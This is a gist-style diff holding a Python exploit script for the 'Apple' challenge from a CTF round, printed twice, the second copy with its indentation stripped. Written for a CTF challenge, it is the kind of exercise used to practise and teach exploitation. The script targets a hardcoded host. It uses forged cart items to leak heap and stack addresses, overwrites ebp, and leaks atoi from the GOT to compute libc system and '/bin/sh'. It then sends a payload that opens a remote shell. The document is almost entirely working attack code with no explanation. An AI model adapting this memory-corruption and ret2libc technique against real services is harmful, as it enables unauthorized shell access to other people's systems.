peternguyen93 · January 24, 2016 04:15
diff --git a/[MatesCTF_Round3]_Apple.py b/[MatesCTF_Round3]_Apple.py
 #!/usr/bin/python
 # Author : peternguyen

 from Pwn import *
 import re

 # p = Pwn(elf='./apple_DA0AEF582865A302F7DC56E62C4554BB')
 p = Pwn(host='125.235.240.168',port=10002,elf='./apple_DA0AEF582865A302F7DC56E62C4554BB')

 def add_item(item_id):
 	p.read_until('>')
 	p.write('2\n')

 	p.read_until('Device Number>')
 	p.write(str(item_id) + '\n')

 def del_item(item_id):
 	p.read_until('>')
 	p.write('3\n')

 	p.read_until('Item Number>')
 	p.write(str(item_id) + '\n')

 def checkout():
 	p.read_until('>')
 	p.write('5\n')
 	p.read_until('Let me check your cart. ok? (y/n)')
 	p.write('y\n')
 	p.read_until('Total: $7175')

 def extract(value):
 	l = re.findall(r'27: (.*) -',value)
 	return p.unpack(l[0][:4])


 def exploit(**kargs):
 	global p # use global var
 	if kargs.has_key('p'):
 		if kargs['p'].__class__.__name__ == 'Pwn': # is pwn object
 			p = kargs['p']
 	p.connect()

 	# raw_input('Debug>')

 	for i in xrange(6):
 		add_item(1)

 	for i in xrange(20):
 		add_item(2)

 	checkout()

 	fake_item = [
 		0x804b070, # device_name (myCart->next)
 		0x41414141, # cost
 		0, # next
 		0x51515151 # prev
 	]
 	
 	p.read_until('>')
 	p.send('4\n')
 	p.read_until('Let me check your cart. ok? (y/n) > ')
 	p.send('yA' + p.pA(fake_item) + '\n')
 	leak = p.read_until('>')
 	heap_base = extract(leak)
 	print 'heap base',hex(heap_base)	
 	fake_item[0] = heap_base + 1184
 	p.send('4\n')
 	p.read_until('Let me check your cart. ok? (y/n) > ')
 	p.send('yA' + p.pA(fake_item) + '\n')
 	leak = p.read_until('>')

 	stack_addr = extract(leak)
 	print 'stack addr',hex(stack_addr)

 	fake_item1 = [
 		p.got['atoi'],
 		0x42424242,
 		stack_addr + 12,
 		stack_addr + 32 - 8, # ebp 
 	]
 	# fake_item1 = [0x41414141]*4

 	p.send('3\n')
 	p.read_until('Item Number>')
 	p.send('27' + p.pA(fake_item1) + '\n') # overwrite ebp

 	leak = p.read_until('from your shopping cart.')
 	atoi_addr = re.findall(r'Remove 27:(.*) from your shopping cart.',leak)[0]
 	atoi_addr = p.unpack(atoi_addr)
 	off,base = p.get_libc_offset(atoi_addr,'atoi')
 	system_addr = atoi_addr - off
 	off,base = p.get_libc_offset(atoi_addr,'atoi','/bin/sh')
 	binsh_addr = atoi_addr - off

 	print 'atoi()',hex(atoi_addr)
 	print 'system()',hex(system_addr)
 	print '/bin/sh',hex(binsh_addr)

 	pl = 'AA' + p.pA([
 		system_addr,
 		0x080487e2,
 		binsh_addr,
 		0x080487e2 # (c9c3)	leave; ret
 	])

 	p.read_until('>')
 	p.send(pl + '\n')
 	# p.send('AAA%AAsAABAA$AAnAACA\n')

 	p.io()

 exploit()
	#!/usr/bin/python
	# Author : peternguyen

	from Pwn import *
	import re

	# p = Pwn(elf='./apple_DA0AEF582865A302F7DC56E62C4554BB')
	p = Pwn(host='125.235.240.168',port=10002,elf='./apple_DA0AEF582865A302F7DC56E62C4554BB')

	def add_item(item_id):
	p.read_until('>')
	p.write('2\n')

	p.read_until('Device Number>')
	p.write(str(item_id) + '\n')

	def del_item(item_id):
	p.read_until('>')
	p.write('3\n')

	p.read_until('Item Number>')
	p.write(str(item_id) + '\n')

	def checkout():
	p.read_until('>')
	p.write('5\n')
	p.read_until('Let me check your cart. ok? (y/n)')
	p.write('y\n')
	p.read_until('Total: $7175')

	def extract(value):
	l = re.findall(r'27: (.*) -',value)
	return p.unpack(l[0][:4])


	def exploit(**kargs):
	global p # use global var
	if kargs.has_key('p'):
	if kargs['p'].__class__.__name__ == 'Pwn': # is pwn object
	p = kargs['p']
	p.connect()

	# raw_input('Debug>')

	for i in xrange(6):
	add_item(1)

	for i in xrange(20):
	add_item(2)

	checkout()

	fake_item = [
	0x804b070, # device_name (myCart->next)
	0x41414141, # cost
	0, # next
	0x51515151 # prev
	]

	p.read_until('>')
	p.send('4\n')
	p.read_until('Let me check your cart. ok? (y/n) > ')
	p.send('yA' + p.pA(fake_item) + '\n')
	leak = p.read_until('>')
	heap_base = extract(leak)
	print 'heap base',hex(heap_base)
	fake_item[0] = heap_base + 1184
	p.send('4\n')
	p.read_until('Let me check your cart. ok? (y/n) > ')
	p.send('yA' + p.pA(fake_item) + '\n')
	leak = p.read_until('>')

	stack_addr = extract(leak)
	print 'stack addr',hex(stack_addr)

	fake_item1 = [
	p.got['atoi'],
	0x42424242,
	stack_addr + 12,
	stack_addr + 32 - 8, # ebp
	]
	# fake_item1 = [0x41414141]*4

	p.send('3\n')
	p.read_until('Item Number>')
	p.send('27' + p.pA(fake_item1) + '\n') # overwrite ebp

	leak = p.read_until('from your shopping cart.')
	atoi_addr = re.findall(r'Remove 27:(.*) from your shopping cart.',leak)[0]
	atoi_addr = p.unpack(atoi_addr)
	off,base = p.get_libc_offset(atoi_addr,'atoi')
	system_addr = atoi_addr - off
	off,base = p.get_libc_offset(atoi_addr,'atoi','/bin/sh')
	binsh_addr = atoi_addr - off

	print 'atoi()',hex(atoi_addr)
	print 'system()',hex(system_addr)
	print '/bin/sh',hex(binsh_addr)

	pl = 'AA' + p.pA([
	system_addr,
	0x080487e2,
	binsh_addr,
	0x080487e2 # (c9c3) leave; ret
	])

	p.read_until('>')
	p.send(pl + '\n')
	# p.send('AAA%AAsAABAA$AAnAACA\n')

	p.io()

	exploit()